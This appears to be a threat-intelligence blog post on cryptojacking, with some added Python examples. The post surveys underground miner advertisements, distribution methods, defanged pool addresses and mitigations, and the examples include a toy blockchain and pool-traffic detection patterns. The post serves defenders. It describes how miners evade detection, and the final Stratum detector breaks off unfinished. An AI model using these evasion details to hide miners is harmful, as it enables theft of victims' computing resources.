This blog post discusses the various trends that we have been observing related to cryptojacking activity, including cryptojacking modules being added to popular malware families, an increase in drive-by cryptomining attacks, the use of mobile apps containing cryptojacking code, cryptojacking as a threat to critical infrastructure, and observed distribution mechanisms.

What Is Mining?

As transactions occur on a blockchain, those transactions must be validated and propagated across the network. As computers connected to the blockchain network (aka nodes) validate and propagate the transactions across the network, the miners include those transactions into "blocks" so that they can be added onto the chain. Each block is cryptographically hashed, and must include the hash of the previous block, thus forming the "chain" in blockchain. In order for miners to compute the complex hashing of each valid block, they must use a machine's computational resources. The more blocks that are mined, the more resource-intensive solving the hash becomes. To overcome this, and accelerate the mining process, many miners will join collections of computers called "pools" that work together to calculate the block hashes. The more computational resources a pool harnesses, the greater the pool's chance of mining a new block. When a new block is mined, the pool's participants are rewarded with coins. Figure 1 illustrates the roles miners play in the blockchain network.


Figure 1: The role of miners
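The mining process described above, as an added example that is not part of the FireEye post: a toy proof-of-work chain in which each block embeds the previous block's hash, miners search for a nonce that satisfies a leading-zero target, and a node's validation shows why editing an earlier block breaks every link after it. It uses SHA-256 (the Bitcoin style the post mentions) rather than Monero's CryptoNight, and the difficulty, transactions and worker count are constructed for illustration:

```python
"""Toy proof-of-work chain showing what the miners in Figure 1 actually compute.

Added example, not part of the FireEye post. It uses SHA-256 and a leading-zero
target (the Bitcoin style the post mentions), not Monero's CryptoNight; the
difficulty, transactions and worker count are constructed for illustration.
"""
import hashlib
import json

DIFFICULTY = 3           # required leading hex zeros; real networks demand far more
GENESIS_HASH = "0" * 64  # the chain's first block links to an all-zero hash


def block_hash(index, prev_hash, transactions, nonce):
    """Hash a block's contents; canonical JSON so every node hashes the same bytes."""
    payload = json.dumps(
        {"index": index, "prev_hash": prev_hash, "tx": transactions, "nonce": nonce},
        sort_keys=True, separators=(",", ":"))
    return hashlib.sha256(payload.encode()).hexdigest()


def mine_block(index, prev_hash, transactions, difficulty=DIFFICULTY, start_nonce=0, step=1):
    """Try nonces start_nonce, start_nonce+step, ... until the hash meets the target.

    start_nonce/step partition the search space, which is what a pool does when it
    hands disjoint work to its members: the more hashes you contribute, the more
    often your nonce is the winning one.
    """
    target = "0" * difficulty
    nonce = start_nonce
    while True:
        h = block_hash(index, prev_hash, transactions, nonce)
        if h.startswith(target):
            return {"index": index, "prev_hash": prev_hash, "tx": transactions,
                    "nonce": nonce, "hash": h}
        nonce += step


def pool_mine(index, prev_hash, transactions, workers=4, difficulty=DIFFICULTY):
    """Simulate a pool of equally fast workers searching disjoint nonce classes.

    Worker w only tests nonces congruent to w modulo `workers`. Returns the block
    found with the fewest rounds of work and the id of the worker that found it.
    """
    candidates = []
    for w in range(workers):
        blk = mine_block(index, prev_hash, transactions, difficulty, start_nonce=w, step=workers)
        rounds = (blk["nonce"] - w) // workers   # hashes this worker spent
        candidates.append((rounds, w, blk))
    _, winner, blk = min(candidates)
    return blk, winner


def build_chain(tx_batches, difficulty=DIFFICULTY):
    """Mine one block per batch of transactions, each linked to the previous hash."""
    chain, prev = [], GENESIS_HASH
    for i, txs in enumerate(tx_batches):
        blk = mine_block(i, prev, txs, difficulty)
        chain.append(blk)
        prev = blk["hash"]
    return chain


def is_valid_chain(chain, difficulty=DIFFICULTY):
    """A node's check: every block links to its predecessor, re-hashes correctly, and meets the target."""
    prev = GENESIS_HASH
    for blk in chain:
        if blk["prev_hash"] != prev:
            return False
        h = block_hash(blk["index"], blk["prev_hash"], blk["tx"], blk["nonce"])
        if h != blk["hash"] or not h.startswith("0" * difficulty):
            return False
        prev = h
    return True


def tamper_demo(difficulty=DIFFICULTY):
    """Rewrite one transaction in the middle of the chain and show that validation fails."""
    chain = build_chain([["alice->bob:5"], ["bob->carol:2"], ["carol->dave:1"]], difficulty)
    before = is_valid_chain(chain, difficulty)
    chain[1]["tx"] = ["bob->carol:200"]   # history edit: block 1 no longer hashes to its stored value
    after = is_valid_chain(chain, difficulty)
    return before, after


if __name__ == "__main__":
    blk, winner = pool_mine(0, GENESIS_HASH, ["coinbase->pool:reward"])
    print(f"block 0 mined by worker {winner} with nonce {blk['nonce']}: {blk['hash']}")
    print("chain valid before/after tampering:", tamper_demo())
```

Raising DIFFICULTY by one multiplies the expected number of hashes per block by 16, which is the lever that makes stolen CPU time valuable to a cryptojacker: the work is pure hashing, and every infected machine adds to the attacker's share of the pool's reward.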

Underground Interest

FireEye iSIGHT Intelligence has identified eCrime actor interest in cryptocurrency mining-related topics dating back to at least 2009 within underground communities. Keywords that yielded significant volumes include miner, cryptonight, stratum, xmrig, and cpuminer. While searches for certain keywords fail to provide context, the frequency of these cryptocurrency mining-related keywords shows a sharp increase in conversations beginning in 2017 (Figure 2). It is probable that at least a subset of actors prefer cryptojacking over other types of financially motivated operations due to the perception that it does not attract as much attention from law enforcement.


Figure 2: Underground keyword mentions

Monero Is King

The majority of recent cryptojacking operations have overwhelmingly focused on mining Monero, an open-source cryptocurrency based on the CryptoNote protocol, as a fork of Bytecoin. Unlike many cryptocurrencies, Monero uses a unique technology called "ring signatures," which shuffles users' public keys to eliminate the possibility of identifying a particular user, ensuring it is untraceable. Monero also employs a protocol that generates multiple, unique single-use addresses that can only be associated with the payment recipient and are unfeasible to be revealed through blockchain analysis, ensuring that Monero transactions are unable to be linked while also being cryptographically secure.

The Monero blockchain also uses what's called a "memory-hard" hashing algorithm called CryptoNight and, unlike Bitcoin's SHA-256 algorithm, it deters application-specific integrated circuit (ASIC) chip mining. This feature is critical to the Monero developers and allows for CPU mining to remain feasible and profitable. Due to these inherent privacy-focused features and CPU-mining profitability, Monero has become an attractive option for cyber criminals.

Underground Advertisements for Miners

Because most miner utilities are small, open-sourced tools, many criminals rely on crypters. Crypters are tools that employ encryption, obfuscation, and code manipulation techniques to keep their tools and malware fully undetectable (FUD). Table 1 highlights some of the most commonly repurposed Monero miner utilities.

XMR Mining Utilities

  • XMR-STACK
  • MINERGATE
  • XMRMINER
  • CCMINER
  • XMRIG
  • CLAYMORE
  • SGMINER
  • CAST XMR
  • LUKMINER
  • CPUMINER-MULTI

Table 1: Commonly used Monero miner utilities

The following are sample advertisements for miner utilities commonly observed in underground forums and markets. Advertisements typically range from stand-alone miner utilities to those bundled with other functions, such as credential harvesters, remote administration tool (RAT) behavior, USB spreaders, and distributed denial-of-service (DDoS) capabilities.

Sample Advertisement #1 (Smart Miner + Builder)

In early April 2018, actor "Mon£y" was observed by FireEye iSIGHT Intelligence selling a Monero miner for $80 USD – payable via Bitcoin, Bitcoin Cash, Ether, Litecoin, or Monero – that included unlimited builds, free automatic updates, and 24/7 support. The tool, dubbed Monero Madness (Figure 3), featured a setting called Madness Mode that configures the miner to only run when the infected machine is idle for at least 60 seconds. This allows the miner to work at its full potential without running the risk of being identified by the user. According to the actor, Monero Madness also provides the following features:

  • Unlimited builds
  • Builder GUI (Figure 4)
  • Written in AutoIT (no dependencies)
  • FUD
  • Safer error handling
  • Uses most recent XMRig code
  • Customizable pool/port
  • Packed with UPX
  • Works on all Windows OS (32- and 64-bit)
  • Madness Mode option


Figure 3: Monero Madness


Figure 4: Monero Madness builder

Sample Advertisement #2 (Miner + Telegram Bot Builder)

In March 2018, FireEye iSIGHT Intelligence observed actor "kent9876" advertising a Monero cryptocurrency miner called Goldig Miner (Figure 5). The actor requested payment of $23 USD for either CPU or GPU build or $50 USD for both. Payments could be made with Bitcoin, Ether, Litecoin, Dash, or PayPal. The miner ostensibly offers the following features:

  • Written in C/C++
  • Build size is small (about 100–150 kB)
  • Hides miner process from popular task managers
  • Can run without Administrator privileges (user-mode)
  • Auto-update ability
  • All data encoded with 256-bit key
  • Access to Telegram bot-builder
  • Lifetime support (24/7) via Telegram


Figure 5: Goldig Miner advertisement

Sample Advertisement #3 (Miner + Credential Stealer)

In March 2018, FireEye iSIGHT Intelligence observed actor "TH3FR3D" offering a tool dubbed Felix (Figure 6) that combines a cryptocurrency miner and credential stealer. The actor requested payment of $50 USD payable via Bitcoin or Ether. According to the advertisement, the Felix tool boasted the following features:

  • Written in C# (Version 1.0.1.0)
  • Browser stealer for all major browsers (cookies, saved passwords, auto-fill)
  • Monero miner (uses minergate.com pool by default, but can be configured)
  • Filezilla stealer
  • Desktop file grabber (.txt and more)
  • Can download and execute files
  • Update ability
  • USB spreader functionality
  • PHP web panel


Figure 6: Felix HTTP

Sample Advertisement #4 (Miner + RAT)

In January 2018, FireEye iSIGHT Intelligence observed actor "ups" selling a miner for any Cryptonight-based cryptocurrency (e.g., Monero and Dashcoin) for either Linux or Windows operating systems. In addition to being a miner, the tool allegedly provides local privilege escalation through the CVE-2016-0099 exploit, can download and execute remote files, and receive commands. Buyers could purchase the Windows or Linux tool for €200 EUR, or €325 EUR for both the Linux and Windows builds, payable via Monero, bitcoin, ether, or dash. According to the actor, the tool offered the following:

Windows Build Specifics

  • Written in C++ (no dependencies)
  • Miner component based on XMRig
  • Easy cryptor and VPS hosting options
  • Web panel (Figure 7)
  • Uses TLS for secured communication
  • Download and execute
  • Auto-update ability
  • Cleanup routine
  • Receive remote commands
  • Perform privilege escalation
  • Features "game mode" (mining stops if user plays game)
  • Proxy feature (based on XMRig)
  • Support (for €20/month)
  • Kills other miners from list
  • Hidden from TaskManager
  • Configurable pool, coin, and wallet (via panel)
  • Can mine the following Cryptonight-based coins:
    • Monero
    • Bytecoin
    • Electroneum
    • DigitalNote
    • Karbowanec
    • Sumokoin
    • Fantomcoin
    • Dinastycoin
    • Dashcoin
    • LeviarCoin
    • BipCoin
    • QuazarCoin
    • Bitcedi

Linux Build Specifics

  • Issues running on Linux servers (higher performance on desktop OS)
  • Compatible with AMD64 processors on Ubuntu, Debian, Mint (support for CentOS later)


Figure 7: Miner bot web panel

Sample Advertisement #5 (Miner + USB Spreader + DDoS Tool)

In August 2017, actor "MeatyBanana" was observed by FireEye iSIGHT Intelligence selling a Monero miner utility that included the ability to download and execute files and perform DDoS attacks. The actor offered the software for $30 USD, payable via Bitcoin. Ostensibly, the tool works with CPUs only and offers the following features:

  • Configurable miner pool and port (default to minergate)
  • Compatible with 64-bit and 32-bit (x86) Windows OS
  • Hides from the following popular task managers:
    • Windows Task Manager
    • Process Killer
    • KillProcess
    • System Explorer
    • Process Explorer
    • AnVir
    • Process Hacker
  • Masked as a system driver
  • Does not require administrator privileges
  • No dependencies
  • Registry persistence mechanism
  • Ability to perform "tasks" (download and execute files, navigate to a site, and perform DDoS)
  • USB spreader
  • Support after purchase
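The advertisements above all expose the same configuration surface (a pool hostname, a port, and a Stratum connection), and the Underground Interest section lists the terms that dominate the chatter (miner, cryptonight, stratum, xmrig, cpuminer). The following log-scoring routine, added here as an example rather than code from the FireEye post, turns those into network-side detection logic. The keyword indicators come from the post; the log format, the pool-port list, the scoring weights and every log line are constructed for this example:

```python
"""Score proxy/firewall log lines for mining-pool traffic.

Added example, not from the FireEye post. The keyword indicators come from the
terms the post lists (miner, cryptonight, stratum, xmrig, cpuminer) and the
minergate default pool named in several advertisements; the log format, the
port list, the weights and every log line below are constructed for this example.
"""
import re

# (name, pattern, weight): the weights are a constructed scoring scheme; tune per environment.
INDICATORS = [
    ("stratum_uri", re.compile(r"stratum\+(tcp|ssl)://", re.I), 3),
    ("pool_keyword", re.compile(r"(minergate|xmrig|cpuminer|cryptonight|monero|xmr\b)", re.I), 2),
    ("stratum_rpc", re.compile(r'"method"\s*:\s*"(login|submit|getjob)"', re.I), 2),
]
# Ports frequently used by Stratum pools (assumption; 443 is deliberately absent).
POOL_PORTS = {3333, 4444, 5555, 7777, 14444}

LINE_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>\S+) dst=(?P<host>[^:\s]+):(?P<port>\d+) "
    r"proto=\S+ bytes=\d+ info=(?P<info>.*)$")

# Constructed log lines: 10.0.5.22 browses normally, 10.0.5.21 runs a miner,
# 10.0.5.30 merely contacts a minergate hostname over HTTPS.
LOG_LINES = [
    '2018-07-18T09:57:40Z src=10.0.5.22 dst=www.example.com:443 proto=tcp bytes=8812 info=TLS SNI=www.example.com',
    '2018-07-18T09:58:01Z src=10.0.5.21 dst=pool.example-xmr.net:4444 proto=tcp bytes=1532 info=stratum+tcp://pool.example-xmr.net:4444',
    '2018-07-18T09:58:03Z src=10.0.5.21 dst=pool.example-xmr.net:4444 proto=tcp bytes=410 info={"method":"login","params":{"agent":"XMRig/2.6.4"}}',
    '2018-07-18T10:02:11Z src=10.0.5.30 dst=minergate.com:443 proto=tcp bytes=980 info=TLS SNI=minergate.com',
    '2018-07-18T10:03:00Z src=10.0.5.22 dst=update.example.org:80 proto=tcp bytes=20480 info=GET /patch.bin',
]


def score_line(line):
    """Return (src, host, score, indicator names) or None if the line does not parse."""
    m = LINE_RE.match(line)
    if not m:
        return None
    text = f"{m['host']} {m['info']}"
    hits, score = [], 0
    for name, rx, weight in INDICATORS:
        if rx.search(text):        # each indicator counts once per line
            hits.append(name)
            score += weight
    if int(m["port"]) in POOL_PORTS:
        hits.append("pool_port")
        score += 1
    return m["src"], m["host"], score, hits


def scan_log(lines, threshold=3):
    """Aggregate per source host; >= threshold is 'likely mining', anything lower is 'review'."""
    per_src = {}
    for line in lines:
        result = score_line(line)
        if not result or result[2] == 0:
            continue
        src, host, score, hits = result
        entry = per_src.setdefault(src, {"score": 0, "hosts": set(), "indicators": set()})
        entry["score"] += score
        entry["hosts"].add(host)
        entry["indicators"].update(hits)
    for entry in per_src.values():
        entry["verdict"] = "likely mining" if entry["score"] >= threshold else "review"
    return per_src


if __name__ == "__main__":
    for src, entry in sorted(scan_log(LOG_LINES).items()):
        print(f"{src}: {entry['verdict']} (score {entry['score']}) "
              f"hosts={sorted(entry['hosts'])} indicators={sorted(entry['indicators'])}")
```

The point of aggregating per source rather than alerting per line is that a single keyword hit (a researcher reading about minergate, say) stays at "review", while a host that both opens a stratum+tcp session and sends a Stratum login crosses the threshold on its own. Pair the network signal with the host-side symptom the post describes next, sustained CPU load, to confirm.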

The Cost of Cryptojacking

The presence of mining software on a network can generate costs on three fronts as the miner surreptitiously allocates resources:

  1. Degradation in system performance
  2. Increased cost in electricity
  3. Potential exposure of security holes

Cryptojacking targets computer processing power, which can lead to high CPU load and degraded performance. In extreme cases, CPU overload may even cause the operating system to crash. Infected machines may also attempt to infect neighboring machines and therefore generate large amounts of traffic that can overload victims' computer networks.

In the case of operational technology (OT) networks, the consequences could be severe. Supervisory control and data acquisition/industrial control systems (SCADA/ICS) environments predominantly rely on decades-old hardware and low-bandwidth networks, so even a slight increase in CPU or network load could leave industrial infrastructure unresponsive, impeding operators from interacting with the controlled process in real time.

The electricity cost, measured in kilowatt-hours (kWh), depends on several factors: how often the malicious miner software is configured to run, how many threads it is configured to use while running, and the number of machines mining on the victim's network. The cost per kWh is also highly variable and depends on geolocation. For example, security researchers who ran Coinhive on a machine for 24 hours found that the electrical consumption was 1.212 kWh. They estimated that this equated to electrical costs per month of $10.50 USD in the United States, $5.45 USD in Singapore, and $12.30 USD in Germany.

Cryptojacking can also highlight often overlooked security holes in a company's network. Organizations infected with cryptomining malware are also likely vulnerable to more severe exploits and attacks, ranging from ransomware to ICS-specific malware such as TRITON.

Cryptocurrency Miner Distribution Techniques

In order to maximize profits, cyber criminals widely disseminate their miners using various techniques such as incorporating cryptojacking modules into existing botnets, drive-by cryptomining attacks, the use of mobile apps containing cryptojacking code, and distributing cryptojacking utilities via spam and self-propagating utilities. Threat actors can use cryptojacking to affect numerous devices and secretly siphon their computing power. Some of the most commonly observed devices targeted by these cryptojacking schemes are:

  • User endpoint machines
  • Enterprise servers
  • Websites
  • Mobile devices
  • Industrial control systems

Cryptojacking in the Cloud

Private sector companies and governments alike are increasingly moving their data and applications to the cloud, and cyber threat groups have been moving with them. Recently, there have been various reports of actors conducting cryptocurrency mining operations specifically targeting cloud infrastructure. Cloud infrastructure is increasingly a target for cryptojacking operations because it offers actors an attack surface with large amounts of processing power in an environment where CPU usage and electricity costs are already expected to be high, thus allowing their operations to potentially go unnoticed. We assess with high confidence that threat actors will continue to target enterprise cloud networks in efforts to harness their collective computational resources for the foreseeable future.

The following are some real-world examples of cryptojacking in the cloud:

  • In February 2018, FireEye researchers published a blog detailing various techniques actors used in order to deliver malicious miner payloads (specifically to vulnerable Oracle servers) by abusing CVE-2017-10271. Refer to our blog post for more detailed information regarding the post-exploitation and pre-mining dissemination techniques used in those campaigns.
  • In March 2018, Bleeping Computer reported on the trend of cryptocurrency mining campaigns moving to the cloud via vulnerable Docker and Kubernetes applications, which are two software tools used by developers to help scale a company's cloud infrastructure. In most cases, successful attacks occur due to misconfigured applications and/or weak security controls and passwords.
  • In February 2018, Bleeping Computer also reported on hackers who breached Tesla's cloud servers to mine Monero. Attackers identified a Kubernetes console that was not password protected, allowing them to discover login credentials for the broader Tesla Amazon Web Services (AWS) S3 cloud environment. Once the attackers gained access to the AWS environment via the harvested credentials, they effectively launched their cryptojacking operations.
  • Reports of cryptojacking activity due to misconfigured AWS S3 cloud storage buckets have also been observed, as was the case in the LA Times online compromise in February 2018. The presence of vulnerable AWS S3 buckets allows anyone on the internet to access and change hosted content, including the ability to inject mining scripts or other malicious software.

Incorporation of Cryptojacking into Existing Botnets

FireEye iSIGHT Intelligence has observed multiple prominent botnets such as Dridex and Trickbot incorporate cryptocurrency mining into their existing operations. Many of these families are modular in nature and have the ability to download and execute remote files, thus allowing the operators to easily turn their infections into cryptojacking bots. While these operations have traditionally been aimed at credential theft (particularly of banking credentials), adding mining modules or downloading secondary mining payloads provides the operators another avenue to generate additional revenue with little effort. This is especially true in cases where the victims were deemed unprofitable or have already been exploited in the original scheme.

The following are some real-world examples of cryptojacking being incorporated into existing botnets:

  • In early February 2018, FireEye iSIGHT Intelligence observed Dridex botnet ID 2040 download a Monero cryptocurrency miner based on the open-source XMRig miner.
  • On Feb. 12, 2018, FireEye iSIGHT Intelligence observed the banking malware IcedID injecting Monero-mining JavaScript into webpages for specific, targeted URLs. The IcedID injects launched an anonymous miner using the mining code from Coinhive's AuthedMine.
  • In late 2017, Bleeping Computer reported that security researchers with Radware observed the hacking group CodeFork leveraging the popular downloader Andromeda (aka Gamarue) to distribute a miner module to their existing botnets.
  • In late 2017, FireEye researchers observed Trickbot operators deploy a new module named "testWormDLL" that is a statically compiled copy of the popular XMRig Monero miner.
  • On Aug. 29, 2017, Security Week reported on a variant of the popular Neutrino banking Trojan, including a Monero miner module. According to their reporting, the new variant no longer aims at stealing bank card data, but instead is limited to downloading and executing modules from a remote server.

Drive-By Cryptojacking

In-Browser

FireEye iSIGHT Intelligence has examined various customer reports of browser-based cryptocurrency mining. Browser-based mining scripts have been observed on compromised websites, third-party advertising platforms, and have been legitimately placed on websites by publishers. While coin mining scripts can be embedded directly into a webpage's source code, they are frequently loaded from third-party websites. Identifying and detecting websites that have embedded coin mining code can be difficult since not all coin mining scripts are authorized by website publishers, such as in the case of a compromised website. Further, in cases where coin mining scripts were authorized by a website owner, they are not always clearly communicated to site visitors. At the time of reporting, the most popular script being deployed in the wild is Coinhive. Coinhive is an open-source JavaScript library that, when loaded on a vulnerable website, can mine Monero using the site visitor's CPU resources, unbeknownst to the user, as they browse the site.

The following are some real-world examples of Coinhive being deployed in the wild:

  • In September 2017, Bleeping Computer reported that the authors of SafeBrowse, a Chrome extension with more than 140,000 users, had embedded the Coinhive script in the extension's code that allowed for the mining of Monero using users' computers and without getting their consent.
  • During mid-September 2017, users on Reddit began complaining about increased CPU usage when they navigated to a popular torrent site, The Pirate Bay (TPB). The spike in CPU usage was a result of Coinhive's script being embedded within the site's footer. According to TPB operators, it was implemented as a test to generate passive revenue for the site (Figure 8).
  • In December 2017, researchers with Sucuri reported on the presence of the Coinhive script being hosted on GitHub.io, which allows users to publish web pages directly from GitHub repositories.
  • Other reporting disclosed the Coinhive script being embedded on the Showtime domain as well as on the LA Times website, both surreptitiously mining Monero.
  • A majority of in-browser cryptojacking activity is transitory in nature and will last only as long as the user’s web browser is open. However, researchers with Malwarebytes Labs uncovered a technique that allows for continued mining activity even after the browser window is closed. The technique leverages a pop-under window surreptitiously hidden under the taskbar. As researchers pointed out, closing the browser window may not be enough to interrupt the activity, and that more advanced actions like running the Task Manager may be required.


Figure 8: Statement from TPB operators on Coinhive script

Malvertising and Exploit Kits

Malvertisements – malicious ads on legitimate websites – commonly redirect visitors of a site to an exploit kit landing page. These landing pages are designed to scan a system for vulnerabilities, exploit those vulnerabilities, and download and execute malicious code onto the system. Notably, the malicious advertisements can be placed on legitimate sites and visitors can become infected with little to no user interaction. This distribution tactic is commonly used by threat actors to widely distribute malware and has been employed in various cryptocurrency mining operations.

The following are some real-world examples of this activity:

  • In early 2018, researchers with Trend Micro reported that a modified miner script was being disseminated across YouTube via Google's DoubleClick ad delivery platform. The script was configured to generate a random number variable between 1 and 100, and when the variable was above 10 it would launch the Coinhive script coinhive.min.js, which harnessed 80 percent of the CPU power to mine Monero. When the variable was below 10 it launched a modified Coinhive script that was also configured to harness 80 percent CPU power to mine Monero. This custom miner connected to the mining pool wss[:]//ws[.]l33tsite[.]info:8443, which was likely done to avoid Coinhive's fees.
  • In April 2018, researchers with Trend Micro also discovered a JavaScript code based on Coinhive injected into an AOL ad platform. The miner used the following private mining pools: wss[:]//wsX[.]www.datasecu[.]download/proxy and wss[:]//www[.]jqcdn[.]download:8893/proxy. Examination of other sites compromised by this campaign showed that in at least some cases the operators were hosting malicious content on unsecured AWS S3 buckets.
  • Since July 16, 2017, FireEye has observed the Neptune Exploit Kit redirect to ads for hiking clubs and MP3 converter domains. Payloads associated with the latter include Monero CPU miners that are surreptitiously installed on victims' computers.
  • In January 2018, Check Point researchers discovered a malvertising campaign leading to the Rig Exploit Kit, which served the XMRig Monero miner utility to unsuspecting victims.

Mobile Cryptojacking

In addition to targeting enterprise servers and user machines, threat actors have also targeted mobile devices for cryptojacking operations. While this technique is less common, likely due to the limited processing power afforded by mobile devices, cryptojacking on mobile devices remains a threat as sustained power consumption can damage the device and dramatically shorten the battery life. Threat actors have been observed targeting mobile devices by hosting malicious cryptojacking apps on popular app stores and through drive-by malvertising campaigns that identify users of mobile browsers.

The following are some real-world examples of mobile devices being used for cryptojacking:

  • During 2014, FireEye iSIGHT Intelligence reported on multiple Android malware apps capable of mining cryptocurrency:
    • In March 2014, Android malware named "CoinKrypt" was discovered, which mined Litecoin, Dogecoin, and CasinoCoin currencies.
    • In March 2014, another form of Android malware – "Android.Trojan.MuchSad.A" or "ANDROIDOS_KAGECOIN.HBT" – was observed mining Bitcoin, Litecoin, and Dogecoin currencies. The malware was disguised as copies of popular applications, including "Football Manager Handheld" and "TuneIn Radio." Variants of this malware have reportedly been downloaded by millions of Google Play users.
    • In April 2014, Android malware named "BadLepricon," which mined Bitcoin, was identified. The malware was reportedly being bundled into wallpaper applications hosted on the Google Play store, at least several of which received 100 to 500 installations before being removed.
    • In October 2014, a type of mobile malware called "Android Slave" was observed in China; the malware was reportedly capable of mining multiple virtual currencies.
  • In December 2017, researchers with Kaspersky Labs reported on a new multi-faceted Android malware capable of a variety of actions including mining cryptocurrencies and launching DDoS attacks. The resource load created by the malware has reportedly been high enough that it can cause the battery to bulge and physically destroy the device. The malware, dubbed Loapi, is unique in the breadth of its potential actions. It has a modular framework that includes modules for malicious advertising, texting, web crawling, Monero mining, and other activities. Loapi is thought to be the work of the same developers behind the 2015 Android malware Podec, and is usually disguised as an anti-virus app.
  • In January 2018, SophosLabs released a report detailing their discovery of 19 mobile apps hosted on Google Play that contained embedded Coinhive-based cryptojacking code, some of which were downloaded anywhere from 100,000 to 500,000 times.
  • Between November 2017 and January 2018, researchers with Malwarebytes Labs reported on a drive-by cryptojacking campaign that affected millions of Android mobile browsers to mine Monero.

Cryptojacking Spam Campaigns

FireEye iSIGHT Intelligence has observed several cryptocurrency miners distributed via spam campaigns, which is a commonly used tactic to indiscriminately distribute malware. We expect malicious actors will continue to use this method to disseminate cryptojacking code for as long as cryptocurrency mining remains profitable.

In late November 2017, FireEye researchers identified a spam campaign delivering a malicious PDF attachment designed to appear as a legitimate invoice from the largest port and container service in New Zealand: Lyttelton Port of Christchurch (Figure 9). Once opened, the PDF would launch a PowerShell script that downloaded a Monero miner from a remote host. The malicious miner connected to the pools supportxmr.com and nanopool.org.


Figure 9: Sample lure attachment (PDF) that downloads malicious cryptocurrency miner

Additionally, a massive cryptojacking spam campaign was discovered by FireEye researchers during January 2018 that was designed to look like legitimate financial services-related emails. The spam email directed victims to an infection link that ultimately dropped a malicious ZIP file onto the victim's machine. Contained within the ZIP file was a cryptocurrency miner utility (MD5: 80b8a2d705d5b21718a6e6efe531d493) configured to mine Monero and connect to the minergate.com pool. While each of the spam email lures and associated ZIP filenames were different, the same cryptocurrency miner sample was dropped across all observed instances (Table 2).

ZIP Filenames

  • california_540_tax_form_2013_instructions.exe
  • state_bank_of_india_money_transfer_agency.exe
  • format_transfer_sms_banking_bni_ke_bca.exe
  • confirmation_receipt_letter_sample.exe
  • sbi_online_apply_2015_po.exe
  • estimated_tax_payment_coupon_irs.exe
  • how_to_add_a_non_us_bank_account_to_paypal.exe
  • western_union_money_transfer_from_uk_to_bangladesh.exe
  • can_i_transfer_money_from_bank_of_ireland_to_aib_online.exe
  • how_to_open_a_business_bank_account_with_bad_credit_history.exe
  • apply_for_sbi_credit_card_online.exe
  • list_of_lucky_winners_in_dda_housing_scheme_2014.exe

Table 2: Sampling of observed ZIP filenames delivering cryptocurrency miner

Cryptojacking Worms

Following the WannaCry attacks, actors began to increasingly incorporate self-propagating functionality within their malware. Some of the observed self-spreading techniques have included copying to removable drives, brute forcing SSH logins, and leveraging the leaked NSA exploit EternalBlue. Cryptocurrency mining operations significantly benefit from this functionality since wider distribution of the malware multiplies the amount of CPU resources available to them for mining. Consequently, we expect that additional actors will continue to develop this capability.

The following are some real-world examples of cryptojacking worms:

  • In May 2017, Proofpoint reported a large campaign distributing mining malware "Adylkuzz." This cryptocurrency miner was observed leveraging the EternalBlue exploit to rapidly spread itself over corporate LANs and wireless networks. This activity included the use of the DoublePulsar backdoor to download Adylkuzz. Adylkuzz infections create botnets of Windows computers that focus on mining Monero.
  • Security researchers with Sensors identified a Monero miner worm, dubbed "Rarogminer," in April 2018 that would copy itself to removable drives each time a user inserted a flash drive or external HDD.
  • In January 2018, researchers at F5 discovered a new Monero cryptomining botnet that targets Linux machines. PyCryptoMiner is a Python-based bot that spreads via the SSH protocol. The bot can also use Pastebin for its command and control (C2) infrastructure. The malware spreads by trying to guess the SSH login credentials of target Linux systems. Once that is achieved, the bot deploys a simple base64-encoded Python script that connects to the C2 server to download and execute more malicious Python code.

Detection Avoidance Methods

Another trend worth noting is the use of proxies to avoid detection. The implementation of mining proxies presents an attractive option for cyber criminals because it allows them to avoid developer and commission fees of 30 percent or more. Avoiding the use of common cryptojacking services such as Coinhive, Cryptloot, and Deepminer, and instead hosting cryptojacking scripts on actor-controlled infrastructure, can circumvent many of the common strategies taken to block this activity via domain or file name blacklisting.

In March 2018, Bleeping Computer reported on the use of cryptojacking proxy servers and determined that as the use of cryptojacking proxy services increases, the effectiveness of ad blockers and browser extensions that rely on blacklists decreases significantly.

Several mining proxy tools can be found on GitHub, such as the XMRig Proxy tool, which greatly reduces the number of active pool connections, and the CoinHive Stratum Mining Proxy, which uses Coinhive’s JavaScript mining library to provide an alternative to using official Coinhive scripts and infrastructure.

In addition to using proxies, actors may also establish their own self-hosted miner apps, either on private servers or on cloud-based servers that support Node.js. Although private servers may provide some benefit over using a commercial mining service, they are still subject to easy blacklisting and require more operational effort to maintain. According to Sucuri researchers, cloud-based servers provide many benefits to actors looking to host their own mining applications, including:

  • Available free or at low-cost
  • No maintenance, just upload the crypto-miner app
  • Harder to block as blacklisting the host address could potentially impact access to legitimate services
  • Resilient to permanent takedown as new hosting accounts can more easily be created using disposable accounts

The combination of proxies and crypto-miners hosted on actor-controlled cloud infrastructure presents a significant hurdle to security professionals, as both make cryptojacking operations more difficult to detect and take down.

Mining Victim Demographics

Based on data from FireEye detection technologies, the detection of cryptocurrency miner malware has increased significantly since the beginning of 2018 (Figure 10), with the most popular mining pools being minergate and nanopool (Figure 11), and the most heavily affected country being the U.S. (Figure 12). Consistent with other reporting, the education sector remains most affected, likely due to more relaxed security controls across university networks and students taking advantage of free electricity to mine cryptocurrencies (Figure 13).


Figure 10: Cryptocurrency miner detection activity per month


Figure 11: Commonly observed pools and associated ports


Figure 12: Top 10 affected countries


Figure 13: Top five affected industries


Figure 14: Top affected industries by country

Mitigation Techniques

Unencrypted Stratum Sessions

According to security researchers at Cato Networks, in order for a miner to participate in pool mining, the infected machine has to run native or JavaScript-based code that uses the Stratum protocol over TCP or HTTP/S. The Stratum protocol uses a publish/subscribe architecture where clients send subscription requests to join a pool and servers send (publish) messages to their subscribed clients. These messages are simple, readable JSON-RPC messages. Subscription requests include the following entities: id, method, and params (Figure 15). A deep packet inspection (DPI) engine can be configured to look for these parameters in order to block Stratum over unencrypted TCP.


Figure 15: Stratum subscription request parameters
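As an added illustration of the DPI rule described above (not code from the FireEye or Cato Networks reports), the following Python function parses newline-delimited Stratum JSON-RPC messages and flags subscription or login requests that carry the id/method/params triple of Figure 15. The method vocabulary and the sample payloads are assumptions drawn from public Stratum and XMRig protocol conventions; the wallet value is a placeholder.

```python
import json
from dataclasses import dataclass
from typing import List, Optional

# Pool-protocol verbs to look for. "mining.*" is the classic Stratum
# vocabulary; "login"/"submit"/"keepalived"/"getjob" is the JSON-RPC dialect
# used by XMRig-family Monero miners (assumed from public protocol docs).
STRATUM_METHODS = {
    "mining.subscribe", "mining.authorize", "mining.submit",
    "mining.notify", "mining.set_difficulty",
    "login", "submit", "keepalived", "getjob",
}


@dataclass
class StratumHit:
    method: str
    msg_id: object
    agent: Optional[str]   # miner software string, if the client sent one
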